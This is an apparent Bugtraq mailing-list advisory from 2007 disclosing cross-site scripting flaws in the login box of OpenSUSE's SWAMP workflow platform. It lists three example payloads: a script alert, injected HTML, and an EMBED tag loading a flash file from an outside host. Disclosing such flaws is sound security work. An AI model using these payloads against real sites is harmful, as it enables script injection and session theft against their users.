Novell OpenSUSE SWAMP multiple XSS
Date: 24 Oct 2007 00:02:01 -0000
From: morin.josh@gmail.com
To: bugtraq@securityfocus.com
Subject: Novell OpenSUSE SWAMP multiple XSS
X-Virus-Scanned: antivirus-gw at tyumen.ru
Vendor Site: http://en.opensuse.org/Swamp
Version affected: ???
Demo:http://swampdemo.suse.de/webswamp/swamp/template/Index.vm
Class: Input Validation Error
Overview:OpenSUSE Workflow Administration and Management Platform login page fails to sufficiently sanitize user-supplied input data via login box.
Example:
1.<script>alert('xss')</script>
2.<html><font color="Red"><b>XSS</b></font></html>
3.<EMBED SRC="http://site.com/xss.swf"
